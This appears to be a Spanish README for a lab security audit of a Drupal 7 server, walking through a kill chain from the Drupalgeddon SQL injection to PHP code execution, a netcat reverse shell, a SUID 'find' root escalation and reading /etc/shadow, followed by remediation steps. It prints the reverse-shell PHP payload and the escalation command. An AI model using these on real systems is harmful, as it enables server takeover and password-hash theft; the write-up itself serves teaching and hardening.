
Auditoría de seguridad Black Box de un servidor Drupal 7. Demostración de una Kill Chain completa: Inyección SQL (CVE-2014-3704) ➔ RCE ➔ Reverse Shell ➔ Escalada a Root (SUID). Este repositorio contiene el informe técnico detallado, las pruebas de explotación (PoC) y las medidas de remediación para asegurar la infraestructura.
Este proyecto se realizó en un entorno de laboratorio controlado y aislado con fines educativos y académicos. No se ha atacado ninguna infraestructura real. El objetivo es aprender a asegurar los sistemas comprendiendo los mecanismos de ataque.
El objetivo de este proyecto es realizar una auditoría en caja negra (Black Box). Esto significa que el análisis comienza sin ningún conocimiento previo del objetivo: no se proporcionó ningún identificador, documentación técnica ni código fuente.
La infraestructura se desplegó virtualmente bajo VMware en una red privada aislada (Host-Only) para evitar cualquier interacción con el exterior.
192.168.78.131
192.168.78.132
El primer paso consistió en cartografiar la superficie de ataque de la máquina objetivo mediante un escaneo de puertos.
Comando ejecutado: nmap -sV 192.168.78.132

Servicios identificados:
El análisis del servicio Web (Puerto 80) y del archivo robots.txt reveló la presencia de un CMS Drupal. La inspección del código fuente permitió identificar una versión obsoleta: Drupal 7.x.
Los resultados de la fase de reconocimiento pusieron de manifiesto una superficie de ataque crítica: un CMS Drupal 7 sin mantenimiento. Esta versión es históricamente conocida por ser vulnerable a fallos de seguridad importantes (especialmente "Drupalgeddon").
Ante esta situación, la auditoría se orientó hacia una búsqueda específica de vulnerabilidades públicas (CVE). Esta enumeración confirmó la existencia de una cadena de explotación completa, que permite pasar de un simple visitante web a un administrador del sistema "Root".
Vectores de ataque identificados:
Explotación de la vulnerabilidad CVE-2014-3704 (Drupalgeddon). Esta vulnerabilidad en la API de base de datos de Drupal permite inyectar comandos SQL sin autenticación.
users con derechos de Administrador.
Una vez conectado como administrador, uso del módulo nativo PHP Filter. Este módulo, mal configurado, permite ejecutar código PHP arbitrario en las páginas del sitio.
<?php system('nc -e /bin/bash 192.168.78.131 4444'); ?>www-data).
Análisis de los archivos con permiso SUID (Set User ID). Descubrimiento de una configuración crítica en el comando find.
find . -exec '/bin/sh' \;find se ejecuta como root, lanzando un shell con privilegios Root (uid=0).Una vez obtenido el acceso root, lectura del archivo sensible /etc/shadow para extraer las huellas (hashes) de las contraseñas de usuarios.

La auditoría reveló un nivel de riesgo CRÍTICO. La combinación de un CMS obsoleto y una negligencia en la configuración del sistema (SUID) permite la compromisión total del servidor.
Impactos para la empresa:
/etc/shadow).Plan de acción prioritario:
chmod u-s /usr/bin/find).Para el detalle técnico completo, los scripts utilizados y el análisis en profundidad, consulte el informe completo: Leer el Informe de Auditoría (PDF)
Fabien MOINE